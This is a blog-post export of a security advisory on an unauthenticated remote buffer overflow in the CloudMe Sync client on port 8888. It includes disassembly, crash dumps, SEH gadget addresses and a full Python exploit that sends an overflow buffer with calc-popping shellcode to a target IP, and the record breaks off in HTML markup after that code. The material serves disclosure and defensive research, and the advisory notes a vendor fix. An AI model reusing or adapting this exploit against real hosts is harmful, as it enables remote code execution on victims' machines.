{"id":11440,"date":"2018-02-11T14:19:14","date_gmt":"2018-02-11T22:19:14","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/02\/11\/news-5211\/"},"modified":"2018-02-11T14:19:14","modified_gmt":"2018-02-11T22:19:14","slug":"news-5211","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/02\/11\/news-5211\/","title":{"rendered":"SSD Advisory &#8211; CloudMe Unauthenticated Remote Buffer Overflow"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Sun, 11 Feb 2018 07:06:24 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3669\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3669');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p>The following advisory describes one (1) vulnerability found in CloudMe.<\/p>\n<p>CloudMe is &#8220;a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software. It features a blue folder that appears on all devices with the same content, all files are synchronized between devices.&#8221;<\/p>\n<p>The vulnerability found is a buffer overflow vulnerability, which when exploited can be used to cause the product to execute arbitrary code.<\/p>\n<p><strong>Credit<\/strong><br \/> A security researcher from, hyp3rlinx, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> The vendor has released CloudMe version 1.11.0 which addresses this vulnerability.<\/p>\n<p><strong>Affected version<\/strong><br \/> CloudMe Sync version v1.10.9 and prior<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> An unauthenticated remote attackers that can connect to the &#8220;CloudMe Sync&#8221; client application listening on port 8888, can send a malicious payload causing a buffer overflow condition. This will result in an attacker controlling the programs execution flow and allowing arbitrary code execution on the victims PC.<\/p>\n<p>CloudMe Sync client creates a socket listening on TCP Port 8888 (0x22B8)<\/p>\n<p>In Qt5Core:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a80c16202d39738238269\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> 00564DF1   . C74424 04 B822&gt;MOV DWORD PTR SS:[ESP+4],22B8  00564DF9   . 890424         MOV DWORD PTR SS:[ESP],EAX  00564DFC   . FF15 B8738100  CALL DWORD PTR DS:[&lt;&amp;Qt5Network._ZN10QTc&gt;;  Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0017 seconds] -->  <\/p>\n<p><strong>Buffer overflow condition<\/strong><br \/> EIP register will be overwritten at about 1075 bytes.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a80c16202d41055172856\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> EAX 00000001  ECX 76F698DA msvcrt.76F698DA  EDX 00350000  EBX 41414141  ESP 0028D470  EBP 41414141  ESI 41414141  EDI 41414141  EIP 41414141<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d41055172856-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d41055172856-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d41055172856-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d41055172856-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d41055172856-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d41055172856-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d41055172856-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d41055172856-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d41055172856-9\">9<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d41055172856-1\"><span class=\"crayon-i\">EAX<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000001<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d41055172856-2\"><span class=\"crayon-i\">ECX<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">76F698DA<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">msvcrt<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-cn\">76F698DA<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d41055172856-3\"><span class=\"crayon-i\">EDX<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00350000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d41055172856-4\"><span class=\"crayon-i\">EBX<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">41414141<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d41055172856-5\"><span class=\"crayon-i\">ESP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0028D470<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d41055172856-6\"><span class=\"crayon-i\">EBP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">41414141<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d41055172856-7\"><span class=\"crayon-i\">ESI<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">41414141<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d41055172856-8\"><span class=\"crayon-i\">EDI<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">41414141<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d41055172856-9\"><span class=\"crayon-i\">EIP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">41414141<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0010 seconds] -->  <\/p>\n<p><strong>Stack dump information<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a80c16202d45915107045\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> (508.524): Access violation &#8211; code c0000005 (first\/second chance not available)  *** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll &#8211;   eax=00000000 ebx=00000000 ecx=41414141 edx=778f353d esi=00000000 edi=00000000  eip=41414141 esp=00091474 ebp=00091494 iopl=0         nv up ei pl zr na pe nc  cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  41414141 ??              ???<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d45915107045-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d45915107045-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d45915107045-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d45915107045-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d45915107045-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d45915107045-6\">6<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d45915107045-1\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">508.524<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Access <\/span><span class=\"crayon-v\">violation<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">code <\/span><span class=\"crayon-e\">c0000005<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">first<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">second <\/span><span class=\"crayon-e\">chance <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">available<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d45915107045-2\"><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ERROR<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Symbol <\/span><span class=\"crayon-e\">file <\/span><span class=\"crayon-e\">could <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-v\">found<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Defaulted <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">export <\/span><span class=\"crayon-e\">symbols <\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ntdll<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">dll<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d45915107045-3\"><span class=\"crayon-v\">eax<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">00000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ebx<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">00000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ecx<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">41414141<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">edx<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">778f353d<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">esi<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">00000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">edi<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">00000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d45915107045-4\"><span class=\"crayon-v\">eip<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">41414141<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">esp<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">00091474<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ebp<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">00091494<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">iopl<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">nv <\/span><span class=\"crayon-e\">up <\/span><span class=\"crayon-e\">ei <\/span><span class=\"crayon-e\">pl <\/span><span class=\"crayon-e\">zr <\/span><span class=\"crayon-e\">na <\/span><span class=\"crayon-e\">pe <\/span><span class=\"crayon-e\">nc<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d45915107045-5\"><span class=\"crayon-v\">cs<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0023<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ss<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">002b<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ds<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">002b<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">es<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">002b<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">fs<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0053<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">gs<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">002b<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">efl<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">00010246<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d45915107045-6\"><span class=\"crayon-cn\">41414141<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-sy\">?<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0030 seconds] -->  <\/p>\n<p>Exploitation is very easy as ASLR SafeSEH are all set to false making the exploit portable and able to work across different operating systems. We will therefore use Structured Exceptional Handler overwrite for our exploit.<\/p>\n<p>e.g.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a80c16202d48455197991\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> 6FE6909D     0x6fe6909d : pop ebx # pop esi # ret 0x20 |  {PAGE_EXECUTE_READ} [libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:UsersvictimoAppDataLocalProgramsCloudMeCloudMelibstdc++-6.dll)  00476795     0x00476795 : pop ebx # pop esi # ret 0x20 | startnull {PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:UsersvictimoAppDataLocalProgramsCloudMeCloudMeCloudMe.exe)  61E7B7F6     0x61e7b7f6 : pop ebx # pop esi # ret 0x20 |  {PAGE_EXECUTE_READ} [Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:UsersvictimoAppDataLocalProgramsCloudMeCloudMeQt5Gui.dll)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d48455197991-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d48455197991-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d48455197991-3\">3<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d48455197991-1\"><span class=\"crayon-cn\">6FE6909D<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x6fe6909d<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">pop <\/span><span class=\"crayon-v\">ebx<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># pop esi # ret 0x20 |&nbsp;&nbsp;{PAGE_EXECUTE_READ} [libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:UsersvictimoAppDataLocalProgramsCloudMeCloudMelibstdc++-6.dll)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d48455197991-2\"><span class=\"crayon-cn\">00476795<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x00476795<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">pop <\/span><span class=\"crayon-v\">ebx<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># pop esi # ret 0x20 | startnull {PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:UsersvictimoAppDataLocalProgramsCloudMeCloudMeCloudMe.exe)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d48455197991-3\"><span class=\"crayon-cn\">61E7B7F6<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x61e7b7f6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">pop <\/span><span class=\"crayon-v\">ebx<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># pop esi # ret 0x20 |&nbsp;&nbsp;{PAGE_EXECUTE_READ} [Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:UsersvictimoAppDataLocalProgramsCloudMeCloudMeQt5Gui.dll)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0011 seconds] -->  <\/p>\n<p><strong>Exploit<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a80c16202d4b112194257\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import socket,struct    print &#8216;CloudMe Sync v1.10.9&#8217;  print &#8216;Unauthenticated Remote Buffer Overflow 0day&#8217;  print &#8216;Discovery\/credits: hyp3rlinx&#8217;  print &#8216;apparition securityn&#8217;      #shellcode to pop calc.exe Windows 7 SP1  sc=(&#8220;x31xF6x56x64x8Bx76x30x8Bx76x0Cx8Bx76x1Cx8B&#8221;  &#8220;x6Ex08x8Bx36x8Bx5Dx3Cx8Bx5Cx1Dx78x01xEBx8B&#8221;  &#8220;x4Bx18x8Bx7Bx20x01xEFx8Bx7Cx8FxFCx01xEFx31&#8221;  &#8220;xC0x99x32x17x66xC1xCAx01xAEx75xF7x66x81xFA&#8221;  &#8220;x10xF5xE0xE2x75xCFx8Bx53x24x01xEAx0FxB7x14&#8221;  &#8220;x4Ax8Bx7Bx1Cx01xEFx03x2Cx97x68x2Ex65x78x65&#8221;  &#8220;x68x63x61x6Cx63x54x87x04x24x50xFFxD5xCC&#8221;)      ip=raw_input(&#8216;[+] CloudMe Target IP&gt; &#8216;)     nseh=&#8221;xEBx06&#8243;+&#8221;x90&#8243;*2                #JMP  seh=struct.pack(&#8216;&lt;L&#8217;,0x61e7b7f6)        #POP,POP RET   junk=&#8221;A&#8221;*2232+nseh+seh+sc+&#8221;B&#8221;*5600  payload=junk+nseh+seh+sc    def PwnMe(ip,payload):      s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)              s.connect((ip,8888))      s.send(payload)      print &#8216;Sending buffer overflow packetz&#8217;      raw_input()      if __name__ == &#8216;__main__&#8217;:      PwnMe(ip,payload)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table 